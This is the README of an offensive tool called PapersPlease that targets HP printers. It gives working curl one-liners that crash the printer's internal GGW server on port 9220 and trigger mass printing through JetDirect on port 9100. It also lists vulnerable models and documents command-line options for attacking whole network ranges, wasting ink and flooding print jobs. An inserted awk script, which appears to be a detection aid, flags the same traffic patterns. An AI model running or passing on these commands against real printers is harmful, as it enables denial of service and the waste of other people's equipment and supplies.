PapersPlease is an exploit that allows an attacker to perform a Denial of Service against an HP printer by crashing the internal GGW server.
NOTE:
It is unknown at this time if GGW Version 2.0 is vulnerable to this exploit.
The Denial of Service exploit is as follows:
```
curl IP:9220 -X 'open 99999999'
```
What's happening here is that we are telling the internal GGW server to retrieve the name of the process running at index number 99999999. Upon receiving the request, however, the GGW server instantly crashes. Any index number 8 or 9 digits in length also causes the GGW server to crash.
The mass-print exploit is as follows:
```
curl IP:9100 -m 1 -X 'Foo Bar'
```
When abusing the JetDirect protocol, PapersPlease connects to port 9100 on the remote host, then immediately disconnects, which in some cases causes a document to be printed. With this exploit an attacker can print hundreds of copies from any vulnerable printer, wasting paper and ink.
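A defender-side check for the two traffic patterns described above, as an added example that is not part of the PapersPlease project: it scans a flow log for `open` requests with an 8- or 9-digit index on port 9220 and for bursts of connections to port 9100. The log format, the sample records, the thresholds and the `detect_printer_abuse` helper are all assumptions made for illustration.

```shell
#!/bin/sh
# Added example (not from the PapersPlease project): flag both patterns in a flow log.
# Assumed, constructed record format, one per line:
#   epoch_seconds src_ip dst_ip dst_port first_line_of_payload

# Constructed sample records.
sample_log() {
cat <<'EOF'
1700000000 10.0.0.5 10.0.0.40 9220 open 3 / HTTP/1.1
1700000001 10.0.0.66 10.0.0.40 9220 open 99999999 / HTTP/1.1
1700000002 10.0.0.66 10.0.0.41 9220 open 123456789 / HTTP/1.1
1700000003 10.0.0.5 10.0.0.41 9100 %!PS-Adobe-3.0
1700000010 10.0.0.66 10.0.0.41 9100 Foo Bar / HTTP/1.1
1700000011 10.0.0.66 10.0.0.41 9100 Foo Bar / HTTP/1.1
1700000012 10.0.0.66 10.0.0.41 9100 Foo Bar / HTTP/1.1
EOF
}

# detect_printer_abuse [WINDOW_SECONDS] [MAX_JOBS]   (hypothetical helper)
# Reads records on stdin, prints one alert per finding:
#   GGW_DOS  src dst index  "open" with an 8- or 9-digit index sent to port 9220
#   JD_BURST src dst count  more than MAX_JOBS connections to port 9100 from one
#                           source to one printer within a WINDOW_SECONDS window
detect_printer_abuse() {
  awk -v win="${1:-60}" -v max="${2:-2}" '
    $4 == 9220 && $5 == "open" && $6 ~ /^[0-9]+$/ && length($6) >= 8 && length($6) <= 9 {
      print "GGW_DOS", $2, $3, $6
    }
    $4 == 9100 {
      k = $2 " " $3
      # Fixed window per source/printer pair, restarted once it expires.
      if (!(k in start) || $1 - start[k] > win) { start[k] = $1; n[k] = 0 }
      n[k]++
      if (n[k] == max + 1) print "JD_BURST", k, n[k]   # alert once per window
    }
  '
}

sample_log | detect_printer_abuse 60 2
```

The window and job threshold are the two positional arguments; tune them to the normal print volume of the network being monitored.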
Model | DoS | Mass Print | GGW Version |
---|---|---|---|
HP Envy 7640 | True | False | Version: 1.0 |
HP OfficeJet Pro 6978 | True | True | Version: 1.0 |
NOTE:
While the above list provides known exploitable models, these do not need to be known prior to attacking.
You will need to install `parallel` from your respective package manager.

```
apt install parallel
```
Along with Parallel, Android users will need to install Termux from the Google Play Store.
```
./Papers_Please.sh [OPTION]

OPTION:                       DESCRIPTION:
-t, --target {IP}             Specify a specific target rather than multiple.
-n, --network {IP/CIDR}       Manually specify an address range to attack.
--print {N}                   Number of jobs to send to the printer. If
                              vulnerable, will cause N number of pages to be
                              printed.
-m, --message {STRING}        Send a custom message to the printer when
                              performing a mass-print attack. It is important
                              to have the string within DOUBLE QUOTES. Default
                              message is "foo-bar".
--ink [N]                     Adds N number of pound signs (#) to the print
                              job. This option is used to make a printer waste
                              a large amount of ink. Default value is 5500.
-i, --interval {N}            The interval before another job is sent to the
                              printer. Where N can be a decimal i.e. 0.1 or a
                              whole number. The default interval is 1.
-j, --jobs {-N|+N|N%|N}       Run N number of jobs in parallel. Defaults to 0.
-p, --proc {-N|+N|N%|N}       Define the maximum N number of processes that
                              can be active at a time. Defaults to 1.
-s, --slots {-N|+N|N%|N}      The N number of file handles available to be
                              used by parallel for jobs. Default is 250.
-P, --port {PORT}             Specify a specific port. Useful for
                              port-forwarded hosts. Port number is set
                              automatically based on the attack being
                              performed. PORT can be any number ranging from
                              1 to 65535.
--no-scan                     Disables the automatic printer discovery scan.
                              By disabling this function the attacker might
                              not know how many hosts were successfully
                              brought down. Also, no scan will be performed
                              when the --target or --ink flag(s) are
                              specified.
--no-check                    Will skip dependency checking.
-q, --quiet                   Suppress output to terminal. Only the progress
                              bar from parallel will be printed in this mode.
-v, --version                 Print version information then exit.
-h, --help                    Print help dialog then exit.
```